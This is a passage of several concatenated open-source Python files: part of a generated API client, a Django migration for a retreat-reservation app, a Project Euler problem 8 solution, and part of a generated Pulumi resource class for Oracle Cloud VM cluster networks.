'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
return self.surveys_controller_upload_endpoint.call_with_http_info(**kwargs)
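Every method in this generated client repeats the same kwargs-defaulting idiom before delegating to `call_with_http_info`. As a standalone sketch of that pattern (the helper name `apply_default_kwargs` is mine, not part of the generated client):

```python
def apply_default_kwargs(kwargs):
    # Mirror of the per-method boilerplate above: fill in each control
    # keyword only if the caller did not supply it.
    defaults = {
        'async_req': False,
        '_return_http_data_only': True,
        '_preload_content': True,
        '_request_timeout': None,
        '_check_input_type': True,
        '_check_return_type': True,
        '_spec_property_naming': False,
        '_content_type': None,
        '_host_index': None,
    }
    for key, default in defaults.items():
        kwargs[key] = kwargs.get(key, default)
    return kwargs
```

A caller can then override any single control flag, e.g. `apply_default_kwargs({'async_req': True})`, and still receive the remaining defaults.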
# --- retirement/migrations/0001_initial.py (Jerome-Celle/Blitz-API, MIT) ---
# Generated by Django 2.0.8 on 2018-12-12 17:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('store', '0010_custompayment_historicalcustompayment'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalPicture',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('name', models.CharField(max_length=253, verbose_name='Name')),
('name_fr', models.CharField(max_length=253, null=True, verbose_name='Name')),
('name_en', models.CharField(max_length=253, null=True, verbose_name='Name')),
('picture', models.TextField(max_length=100, verbose_name='picture')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical Picture',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalReservation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('deleted', models.DateTimeField(editable=False, null=True)),
('is_active', models.BooleanField(verbose_name='Active')),
('cancelation_reason', models.CharField(blank=True, choices=[('U', 'User canceled'), ('RD', 'Retirement deleted'), ('RM', 'Retirement modified')], max_length=100, null=True, verbose_name='Cancelation reason')),
('cancelation_action', models.CharField(blank=True, choices=[('R', 'Refund'), ('E', 'Exchange'), ('N', 'None')], max_length=100, null=True, verbose_name='Cancelation action')),
('cancelation_date', models.DateTimeField(blank=True, null=True, verbose_name='Cancelation date')),
('is_present', models.BooleanField(default=False, verbose_name='Present')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical reservation',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalRetirement',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('country', models.CharField(max_length=45, verbose_name='Country')),
('country_fr', models.CharField(max_length=45, null=True, verbose_name='Country')),
('country_en', models.CharField(max_length=45, null=True, verbose_name='Country')),
('state_province', models.CharField(max_length=55, verbose_name='State/Province')),
('state_province_fr', models.CharField(max_length=55, null=True, verbose_name='State/Province')),
('state_province_en', models.CharField(max_length=55, null=True, verbose_name='State/Province')),
('city', models.CharField(max_length=50, verbose_name='City')),
('city_fr', models.CharField(max_length=50, null=True, verbose_name='City')),
('city_en', models.CharField(max_length=50, null=True, verbose_name='City')),
('address_line1', models.CharField(max_length=45, verbose_name='Address line 1')),
('address_line1_fr', models.CharField(max_length=45, null=True, verbose_name='Address line 1')),
('address_line1_en', models.CharField(max_length=45, null=True, verbose_name='Address line 1')),
('address_line2', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('address_line2_fr', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('address_line2_en', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('postal_code', models.CharField(max_length=10, verbose_name='Postal code')),
('latitude', models.FloatField(blank=True, null=True, verbose_name='Latitude')),
('longitude', models.FloatField(blank=True, null=True, verbose_name='Longitude')),
('timezone', models.CharField(blank=True, max_length=100, null=True, verbose_name='Timezone')),
('deleted', models.DateTimeField(editable=False, null=True)),
('name', models.CharField(max_length=253, verbose_name='Name')),
('name_fr', models.CharField(max_length=253, null=True, verbose_name='Name')),
('name_en', models.CharField(max_length=253, null=True, verbose_name='Name')),
('details', models.CharField(max_length=1000, verbose_name='Details')),
('details_fr', models.CharField(max_length=1000, null=True, verbose_name='Details')),
('details_en', models.CharField(max_length=1000, null=True, verbose_name='Details')),
('seats', models.IntegerField(verbose_name='Seats')),
('activity_language', models.CharField(blank=True, choices=[('EN', 'English'), ('FR', 'French'), ('B', 'Bilingual')], max_length=100, null=True, verbose_name='Activity language')),
('price', models.DecimalField(decimal_places=2, max_digits=6, verbose_name='Price')),
('start_time', models.DateTimeField(verbose_name='Start time')),
('end_time', models.DateTimeField(verbose_name='End time')),
('min_day_refund', models.PositiveIntegerField(verbose_name='Minimum days before the event for refund')),
('refund_rate', models.PositiveIntegerField(verbose_name='Refund rate')),
('min_day_exchange', models.PositiveIntegerField(verbose_name='Minimum days before the event for exchange')),
('is_active', models.BooleanField(verbose_name='Active')),
('email_content', models.TextField(blank=True, max_length=1000, null=True, verbose_name='Email content')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical Retirement',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='Picture',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=253, verbose_name='Name')),
('name_fr', models.CharField(max_length=253, null=True, verbose_name='Name')),
('name_en', models.CharField(max_length=253, null=True, verbose_name='Name')),
('picture', models.ImageField(upload_to='retirements', verbose_name='picture')),
],
options={
'verbose_name': 'Picture',
'verbose_name_plural': 'Pictures',
},
),
migrations.CreateModel(
name='Reservation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('deleted', models.DateTimeField(editable=False, null=True)),
('is_active', models.BooleanField(verbose_name='Active')),
('cancelation_reason', models.CharField(blank=True, choices=[('U', 'User canceled'), ('RD', 'Retirement deleted'), ('RM', 'Retirement modified')], max_length=100, null=True, verbose_name='Cancelation reason')),
('cancelation_action', models.CharField(blank=True, choices=[('R', 'Refund'), ('E', 'Exchange'), ('N', 'None')], max_length=100, null=True, verbose_name='Cancelation action')),
('cancelation_date', models.DateTimeField(blank=True, null=True, verbose_name='Cancelation date')),
('is_present', models.BooleanField(default=False, verbose_name='Present')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Retirement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.CharField(max_length=45, verbose_name='Country')),
('country_fr', models.CharField(max_length=45, null=True, verbose_name='Country')),
('country_en', models.CharField(max_length=45, null=True, verbose_name='Country')),
('state_province', models.CharField(max_length=55, verbose_name='State/Province')),
('state_province_fr', models.CharField(max_length=55, null=True, verbose_name='State/Province')),
('state_province_en', models.CharField(max_length=55, null=True, verbose_name='State/Province')),
('city', models.CharField(max_length=50, verbose_name='City')),
('city_fr', models.CharField(max_length=50, null=True, verbose_name='City')),
('city_en', models.CharField(max_length=50, null=True, verbose_name='City')),
('address_line1', models.CharField(max_length=45, verbose_name='Address line 1')),
('address_line1_fr', models.CharField(max_length=45, null=True, verbose_name='Address line 1')),
('address_line1_en', models.CharField(max_length=45, null=True, verbose_name='Address line 1')),
('address_line2', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('address_line2_fr', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('address_line2_en', models.CharField(blank=True, max_length=45, null=True, verbose_name='Address line 2')),
('postal_code', models.CharField(max_length=10, verbose_name='Postal code')),
('latitude', models.FloatField(blank=True, null=True, verbose_name='Latitude')),
('longitude', models.FloatField(blank=True, null=True, verbose_name='Longitude')),
('timezone', models.CharField(blank=True, max_length=100, null=True, verbose_name='Timezone')),
('deleted', models.DateTimeField(editable=False, null=True)),
('name', models.CharField(max_length=253, verbose_name='Name')),
('name_fr', models.CharField(max_length=253, null=True, verbose_name='Name')),
('name_en', models.CharField(max_length=253, null=True, verbose_name='Name')),
('details', models.CharField(max_length=1000, verbose_name='Details')),
('details_fr', models.CharField(max_length=1000, null=True, verbose_name='Details')),
('details_en', models.CharField(max_length=1000, null=True, verbose_name='Details')),
('seats', models.IntegerField(verbose_name='Seats')),
('activity_language', models.CharField(blank=True, choices=[('EN', 'English'), ('FR', 'French'), ('B', 'Bilingual')], max_length=100, null=True, verbose_name='Activity language')),
('price', models.DecimalField(decimal_places=2, max_digits=6, verbose_name='Price')),
('start_time', models.DateTimeField(verbose_name='Start time')),
('end_time', models.DateTimeField(verbose_name='End time')),
('min_day_refund', models.PositiveIntegerField(verbose_name='Minimum days before the event for refund')),
('refund_rate', models.PositiveIntegerField(verbose_name='Refund rate')),
('min_day_exchange', models.PositiveIntegerField(verbose_name='Minimum days before the event for exchange')),
('is_active', models.BooleanField(verbose_name='Active')),
('email_content', models.TextField(blank=True, max_length=1000, null=True, verbose_name='Email content')),
('exclusive_memberships', models.ManyToManyField(blank=True, related_name='retirements', to='store.Membership', verbose_name='Memberships')),
('users', models.ManyToManyField(blank=True, related_name='retirements', through='retirement.Reservation', to=settings.AUTH_USER_MODEL, verbose_name='User')),
],
options={
'verbose_name': 'Retirement',
'verbose_name_plural': 'Retirements',
},
),
migrations.AddField(
model_name='reservation',
name='retirement',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reservations', to='retirement.Retirement', verbose_name='Retirement'),
),
migrations.AddField(
model_name='reservation',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='retirement_reservations', to=settings.AUTH_USER_MODEL, verbose_name='User'),
),
migrations.AddField(
model_name='picture',
name='retirement',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='pictures', to='retirement.Retirement', verbose_name='Retirement'),
),
migrations.AddField(
model_name='historicalreservation',
name='retirement',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='retirement.Retirement'),
),
migrations.AddField(
model_name='historicalreservation',
name='user',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalpicture',
name='retirement',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='retirement.Retirement'),
),
]
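Several columns in the migration above store short codes paired with human-readable `choices` labels (for example `cancelation_reason`). A minimal sketch of how those code/label pairs behave as a lookup (the dict and function names are illustrative, not part of the migration):

```python
CANCELATION_REASON_CHOICES = [
    ('U', 'User canceled'),
    ('RD', 'Retirement deleted'),
    ('RM', 'Retirement modified'),
]

def cancelation_reason_label(code):
    # Django stores the first element of each pair in the database;
    # get_FOO_display() performs essentially this lookup at runtime,
    # falling back to the raw value for unknown codes.
    return dict(CANCELATION_REASON_CHOICES).get(code, code)
```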
# --- exercises/project_euler_solutions/problem_8.py (leonel-123/python-fundamentals, MIT) ---
"""
problem 8:
The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
"""
l = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
# print(len(l))
def adjacent_digits(num):
    # Slide a window of `num` adjacent digits across `l` and yield the
    # product of each window. Note that slicing past the end of a string
    # never raises, so the loop must be bounded explicitly rather than
    # relying on an exception to terminate it.
    for init in range(len(l) - num + 1):
        n = 1
        for k in l[init:init + num]:
            n *= int(k)
        yield n

max_product = max(adjacent_digits(13))
print(max_product)
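The same sliding-window product can be written as a self-contained function over any digit string, which makes it easy to sanity-check against the 4-digit example (9 × 9 × 8 × 9 = 5832) quoted in the problem statement:

```python
def max_window_product(digits, width):
    # Largest product of `width` adjacent digits in the string `digits`.
    best = 0
    for start in range(len(digits) - width + 1):
        product = 1
        for ch in digits[start:start + width]:
            product *= int(ch)
        best = max(best, product)
    return best
```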
# --- sdk/python/pulumi_oci/database/vm_cluster_network.py (EladGabay/pulumi-oci, ECL-2.0 / Apache-2.0) ---
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['VmClusterNetworkArgs', 'VmClusterNetwork']
@pulumi.input_type
class VmClusterNetworkArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
display_name: pulumi.Input[str],
exadata_infrastructure_id: pulumi.Input[str],
scans: pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]],
vm_networks: pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]],
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a VmClusterNetwork resource.
:param pulumi.Input[str] compartment_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
:param pulumi.Input[str] display_name: The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
:param pulumi.Input[str] exadata_infrastructure_id: The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]] scans: (Updatable) The SCAN details.
:param pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]] vm_networks: (Updatable) Details of the client and backup networks.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns: (Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[Sequence[pulumi.Input[str]]] ntps: (Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "display_name", display_name)
pulumi.set(__self__, "exadata_infrastructure_id", exadata_infrastructure_id)
pulumi.set(__self__, "scans", scans)
pulumi.set(__self__, "vm_networks", vm_networks)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if dns is not None:
pulumi.set(__self__, "dns", dns)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if ntps is not None:
pulumi.set(__self__, "ntps", ntps)
if validate_vm_cluster_network is not None:
pulumi.set(__self__, "validate_vm_cluster_network", validate_vm_cluster_network)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="exadataInfrastructureId")
def exadata_infrastructure_id(self) -> pulumi.Input[str]:
"""
The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "exadata_infrastructure_id")
@exadata_infrastructure_id.setter
def exadata_infrastructure_id(self, value: pulumi.Input[str]):
pulumi.set(self, "exadata_infrastructure_id", value)
@property
@pulumi.getter
def scans(self) -> pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]:
"""
(Updatable) The SCAN details.
"""
return pulumi.get(self, "scans")
@scans.setter
def scans(self, value: pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]):
pulumi.set(self, "scans", value)
@property
@pulumi.getter(name="vmNetworks")
def vm_networks(self) -> pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]:
"""
(Updatable) Details of the client and backup networks.
"""
return pulumi.get(self, "vm_networks")
@vm_networks.setter
def vm_networks(self, value: pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]):
pulumi.set(self, "vm_networks", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter
def dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "dns")
@dns.setter
def dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter
def ntps(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "ntps")
@ntps.setter
def ntps(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ntps", value)
@property
@pulumi.getter(name="validateVmClusterNetwork")
    def validate_vm_cluster_network(self) -> Optional[pulumi.Input[bool]]:
        """
        A boolean flag indicating whether to validate the VM cluster network.
        """
        return pulumi.get(self, "validate_vm_cluster_network")
@validate_vm_cluster_network.setter
def validate_vm_cluster_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "validate_vm_cluster_network", value)


@pulumi.input_type
class _VmClusterNetworkState:
def __init__(__self__, *,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
exadata_infrastructure_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scans: Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None,
vm_cluster_id: Optional[pulumi.Input[str]] = None,
vm_networks: Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]] = None):
"""
Input properties used for looking up and filtering VmClusterNetwork resources.
:param pulumi.Input[str] compartment_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns: (Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[str] exadata_infrastructure_id: The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycle state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ntps: (Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]] scans: (Updatable) The SCAN details.
:param pulumi.Input[str] state: The current state of the VM cluster network.
:param pulumi.Input[str] time_created: The date and time when the VM cluster network was created.
        :param pulumi.Input[bool] validate_vm_cluster_network: A boolean flag indicating whether to validate the VM cluster network.
:param pulumi.Input[str] vm_cluster_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the associated VM Cluster.
:param pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]] vm_networks: (Updatable) Details of the client and backup networks.
"""
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if dns is not None:
pulumi.set(__self__, "dns", dns)
if exadata_infrastructure_id is not None:
pulumi.set(__self__, "exadata_infrastructure_id", exadata_infrastructure_id)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if ntps is not None:
pulumi.set(__self__, "ntps", ntps)
if scans is not None:
pulumi.set(__self__, "scans", scans)
if state is not None:
pulumi.set(__self__, "state", state)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if validate_vm_cluster_network is not None:
pulumi.set(__self__, "validate_vm_cluster_network", validate_vm_cluster_network)
if vm_cluster_id is not None:
pulumi.set(__self__, "vm_cluster_id", vm_cluster_id)
if vm_networks is not None:
pulumi.set(__self__, "vm_networks", vm_networks)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "dns")
@dns.setter
def dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns", value)
@property
@pulumi.getter(name="exadataInfrastructureId")
def exadata_infrastructure_id(self) -> Optional[pulumi.Input[str]]:
"""
The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "exadata_infrastructure_id")
@exadata_infrastructure_id.setter
def exadata_infrastructure_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exadata_infrastructure_id", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
Additional information about the current lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter
def ntps(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "ntps")
@ntps.setter
def ntps(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ntps", value)
@property
@pulumi.getter
def scans(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]]:
"""
(Updatable) The SCAN details.
"""
return pulumi.get(self, "scans")
@scans.setter
def scans(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]]):
pulumi.set(self, "scans", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current state of the VM cluster network.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
